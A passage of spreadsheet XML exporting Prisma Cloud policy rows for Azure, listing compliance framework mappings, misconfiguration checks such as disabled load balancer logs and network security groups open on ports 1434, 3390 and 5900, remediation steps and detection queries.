          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2319">
      <c r="A2319" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ITSG-33, CIS v1.4.0 (Azure), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CIS v1.5.0 (Azure) - Level 1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, Copy of CIS v1.2.0 (Azure), ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Azure Security Benchmark (v3), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Azure Security Benchmark (v2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS v1.3.0 (Azure), CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, Fedramp (Moderate), NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, Brazilian Data Protection Law (LGPD), Copy of Azure Security Benchmark (v3), DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, CIS v1.2.0 (Azure), MTSBv2_Azure, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.1 (Azure)</t>
        </is>
      </c>
      <c r="B2319" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2319" s="2" t="inlineStr"/>
      <c r="D2319" t="inlineStr"/>
      <c r="E2319" t="inlineStr"/>
      <c r="F2319" t="inlineStr"/>
      <c r="G2319" t="b">
        <v>1</v>
      </c>
      <c r="H23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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2319" t="inlineStr">
        <is>
          <t>azure-network-lb</t>
        </is>
      </c>
      <c r="K2319" t="inlineStr">
        <is>
          <t>Azure Load Balancer diagnostics logs are disabled</t>
        </is>
      </c>
      <c r="L2319" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2319" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2319" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2319" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2319" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2319" t="inlineStr">
        <is>
          <t>Logging and Monitoring</t>
        </is>
      </c>
      <c r="R2319" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S2319" t="inlineStr"/>
      <c r="T2319" t="b">
        <v>0</v>
      </c>
      <c r="U2319" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2319" t="inlineStr">
        <is>
          <t>azure-network-lb-list</t>
        </is>
      </c>
      <c r="W2319" t="inlineStr">
        <is>
          <t>Azure Load Balancers provide different types of logs related to alert events, health probe and metrics to help you manage and troubleshoot issues. This policy identifies Azure Load Balancers that have diagnostics logs disabled. As a best practice, enable diagnostic logs to start collecting the data available through these logs.</t>
        </is>
      </c>
      <c r="X2319" t="inlineStr">
        <is>
          <t>Diagnostic logs is not supported for Azure Load Balancer which are in Basic SKU
Please create new Load Balancer and selecting Standard SKU
OR
To upgrade Basic SKU Load Balancer to Standard SKU follow the steps provided in the link below,
https://docs.microsoft.com/en-us/azure/load-balancer/upgrade-basic-standard
For Azure Load Balancer Standard SKU follow below steps,
1. Log in to the Azure portal.
2. Navigate to 'Load Balancers', and select the reported load balancer from the list
3. Select 'Diagnostic settings' under 'Monitoring' section
4. Click on '+Add diagnostic setting'
5. Specify a 'Diagnostic settings name',
6. Under 'Category details' section, select the type of 'Log' that you want to enable
7. Under section 'Destination details',
a. If you select 'Send to Log Analytics', select the 'Subscription' and 'Log Analytics workspace'
b. If you set 'Archive to storage account', select the 'Subscription', 'Storage account' and set the 'Retention (days)'
c. If you set 'Stream to an event hub', select the 'Subscription', 'Event hub namespace', 'Event hub name' and set the 'Event hub policy name'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2319" t="inlineStr"/>
      <c r="Z2319" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-lb-list' AND json.rule =  diagnosticSettings.value[*] size equals 0</t>
        </is>
      </c>
      <c r="AA2319" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2319" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2319" t="inlineStr">
        <is>
          <t>PC-AZR-LB-335</t>
        </is>
      </c>
      <c r="AD2319" t="b">
        <v>1</v>
      </c>
      <c r="AE2319" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2319" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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19" t="inlineStr">
        <is>
          <t>0280e32d-9366-4700-9763-a03be7196614</t>
        </is>
      </c>
      <c r="AI2319" t="inlineStr">
        <is>
          <t>a1fe94d9-606f-4aac-bd73-bca797d3ba9f</t>
        </is>
      </c>
      <c r="AJ2319" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2319" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2320">
      <c r="A2320" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, NIST CSF v2.0, NIST SP 800-172, ISO/IEC 27002:2013, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, FFIEC, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CIS Controls v7.1, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), CSA CCM v4.0.12, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.6, kfirdaus AWS Account-CS, NIST CSF, CSA CCM v.4.0.1, CIS Controls v8, FFIEC, CIS Controls v8.1, NIST CSF, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, CIS Controls v8.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Copy of CIS Controls v8, ISO/IEC 27002:2013, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), FFIEC, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-172, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2320" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2320" s="2" t="inlineStr"/>
      <c r="D2320" t="inlineStr"/>
      <c r="E2320" t="inlineStr"/>
      <c r="F2320" t="inlineStr"/>
      <c r="G2320" t="b">
        <v>1</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2320" t="inlineStr">
        <is>
          <t>azure-network-nic</t>
        </is>
      </c>
      <c r="K2320" t="inlineStr">
        <is>
          <t>Azure Virtual machine NIC has IP forwarding enabled</t>
        </is>
      </c>
      <c r="L2320" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2320" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2320" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2320" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2320" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2320" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2320" t="inlineStr">
        <is>
          <t>4.5</t>
        </is>
      </c>
      <c r="S2320" t="inlineStr"/>
      <c r="T2320" t="b">
        <v>0</v>
      </c>
      <c r="U2320" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2320" t="inlineStr">
        <is>
          <t>azure-network-nic-list</t>
        </is>
      </c>
      <c r="W2320" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual machine NIC which have IP forwarding enabled. IP forwarding on a virtual machine's NIC allows the machine to receive and forward traffic addressed to other destinations. As a best practice, before you enable IP forwarding in a Virtual Machine NIC, review the configuration with your network security team to ensure that it does not allow an attacker to exploit the set up to route packets through the host and compromise your network.</t>
        </is>
      </c>
      <c r="X2320" t="inlineStr">
        <is>
          <t>1.Login to Azure Portal
2.Click on 'All services' on left Navigation
3.Click on 'Network interfaces' under 'Networking'
4.Click on reported resource
5.Click on 'IP configurations' under Settings
6.Select 'Disabled' for 'IP forwarding'
7.Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding</t>
        </is>
      </c>
      <c r="Y2320" t="inlineStr"/>
      <c r="Z2320" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-nic-list' AND json.rule = ['properties.virtualMachine'].id is not empty and ['properties.enableIPForwarding'] exists and ['properties.enableIPForwarding'] is true
{"category":"Networking","resourceTypes":["azurerm_network_interface"]}</t>
        </is>
      </c>
      <c r="AA2320" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2320" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2320" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-633-CKV_AZURE_118</t>
        </is>
      </c>
      <c r="AD2320" t="b">
        <v>1</v>
      </c>
      <c r="AE2320" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2320" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>e3b0e339-22bd-4b91-9157-e1e7482334f3</t>
        </is>
      </c>
      <c r="AI2320" t="inlineStr">
        <is>
          <t>544264bb-eb95-4142-90b3-f7f41d5ef311</t>
        </is>
      </c>
      <c r="AJ2320" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2320" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2321">
      <c r="A2321" t="inlineStr"/>
      <c r="B2321" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2321" s="2" t="inlineStr"/>
      <c r="D2321" t="inlineStr"/>
      <c r="E2321" t="inlineStr"/>
      <c r="F2321" t="inlineStr"/>
      <c r="G2321" t="b">
        <v>0</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2321" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2321" t="inlineStr">
        <is>
          <t>Port 3390 exposed</t>
        </is>
      </c>
      <c r="L2321" t="inlineStr"/>
      <c r="M2321" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2321" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2321" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2321" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2321" t="inlineStr"/>
      <c r="R2321" t="inlineStr"/>
      <c r="S2321" t="inlineStr"/>
      <c r="T2321" t="b">
        <v>0</v>
      </c>
      <c r="U2321" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2321" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2321" t="inlineStr"/>
      <c r="X2321" t="inlineStr"/>
      <c r="Y2321" t="inlineStr"/>
      <c r="Z2321"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(destinationPortRange contains _Port.inRange(3390,3390) or destinationPortRanges[*] contains _Port.inRange(3390,3390) ))] exists</t>
        </is>
      </c>
      <c r="AA2321" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2321" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2321" t="inlineStr"/>
      <c r="AD2321" t="b">
        <v>0</v>
      </c>
      <c r="AE2321" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2321" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>3878eea4-d6a6-45d5-a007-600cc8fb35ec</t>
        </is>
      </c>
      <c r="AI2321" t="inlineStr">
        <is>
          <t>123e6f3a-54b4-4af1-8635-9cbfc46ccb81</t>
        </is>
      </c>
      <c r="AJ2321" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2321" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2322">
      <c r="A2322"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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013,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Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2322" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2322" s="2" t="inlineStr"/>
      <c r="D2322" t="inlineStr"/>
      <c r="E2322" t="inlineStr"/>
      <c r="F2322" t="inlineStr"/>
      <c r="G2322" t="b">
        <v>0</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2322" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2322" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on SQL Server (UDP Port 1434)</t>
        </is>
      </c>
      <c r="L2322" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2322" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2322" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2322" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2322" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2322" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2322" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2322" t="inlineStr"/>
      <c r="T2322" t="b">
        <v>0</v>
      </c>
      <c r="U2322" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2322" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2322" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on SQL Server (UDP Port 1434). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict SQL Server solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2322"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2" t="inlineStr"/>
      <c r="Z2322"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Udp or protocol equals *) and (destinationPortRange contains _Port.inRange(1434,1434) or destinationPortRanges[*] contains _Port.inRange(1434,1434) ))] exists</t>
        </is>
      </c>
      <c r="AA2322" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2322" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2322" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-277</t>
        </is>
      </c>
      <c r="AD2322" t="b">
        <v>1</v>
      </c>
      <c r="AE2322" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2322" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>0546188d-6f21-449d-948e-677c285a5fcf</t>
        </is>
      </c>
      <c r="AI2322" t="inlineStr">
        <is>
          <t>0113c405-c954-4ace-9d94-f0e9728bdf03</t>
        </is>
      </c>
      <c r="AJ2322" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2322" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2323">
      <c r="A2323" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, CSA CCM v.4.0.6, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2323" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2323" s="2" t="inlineStr"/>
      <c r="D2323" t="inlineStr"/>
      <c r="E2323" t="inlineStr"/>
      <c r="F2323" t="inlineStr"/>
      <c r="G2323" t="b">
        <v>0</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2323" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2323" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on ports which are not commonly used</t>
        </is>
      </c>
      <c r="L2323" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2323" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2323" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2323" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2323" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2323" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2323" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2323" t="inlineStr"/>
      <c r="T2323" t="b">
        <v>0</v>
      </c>
      <c r="U2323" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2323" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2323" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Group which allow all traffic on ports which are not commonly used. Ports excluded from this policy are 20, 21, 22, 23, 25, 53, 80, 135, 137, 138, 443, 445, 1433, 1434, 3306, 3389, 4333, 5432, 5500 and 5900. As a best practice, restrict ports solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2323"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3" t="inlineStr"/>
      <c r="Z2323"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Udp or protocol equals Icmp or protocol equals *) and ((destinationPortRange exists and destinationPortRange is not member of (20, 21, 22, 23, 25, 53, 80, 135, 137, 138, 443, 445, 1433, 1434, 3306, 3389, 4333, 5432, 5500, 5900, *)) or (destinationPortRanges is not empty and destinationPortRanges[*] is not member of (20, 21, 22, 23, 25, 53, 80, 135, 137, 138, 443, 445, 1433, 1434, 3306, 3389, 4333, 5432, 5500, 5900, *))) )] exists</t>
        </is>
      </c>
      <c r="AA2323" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2323" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2323" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-699</t>
        </is>
      </c>
      <c r="AD2323" t="b">
        <v>1</v>
      </c>
      <c r="AE2323" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2323" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>0c7887a1-0cbe-4e00-bddf-87689fa65cd0</t>
        </is>
      </c>
      <c r="AI2323" t="inlineStr">
        <is>
          <t>2e8753e8-96eb-4545-9577-347841d9a370</t>
        </is>
      </c>
      <c r="AJ2323" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2323" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2324">
      <c r="A2324"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CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated],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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated],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DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2324" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2324" s="2" t="inlineStr"/>
      <c r="D2324" t="inlineStr"/>
      <c r="E2324" t="inlineStr"/>
      <c r="F2324" t="inlineStr"/>
      <c r="G2324" t="b">
        <v>0</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2324" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2324" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on VNC Server (TCP Port 5900)</t>
        </is>
      </c>
      <c r="L2324" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2324" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2324" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2324" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2324" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2324" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2324" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2324" t="inlineStr"/>
      <c r="T2324" t="b">
        <v>0</v>
      </c>
      <c r="U2324" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2324" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2324" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on VNC Server (TCP Port 5900). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict VNC Server solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2324"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4" t="inlineStr"/>
      <c r="Z2324"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_Port.inRange(5900,5900) or destinationPortRanges[*] contains _Port.inRange(5900,5900) ))] exists</t>
        </is>
      </c>
      <c r="AA2324" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2324" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2324" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-279</t>
        </is>
      </c>
      <c r="AD2324" t="b">
        <v>1</v>
      </c>
      <c r="AE2324" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2324" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>4cddc286-94b0-427a-8747-7f06b51d4689</t>
        </is>
      </c>
      <c r="AI2324" t="inlineStr">
        <is>
          <t>ef4acda9-3e9b-4e75-98c5-f0c64363654d</t>
        </is>
      </c>
      <c r="AJ2324" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2324" t="inlineStr">
        <is>
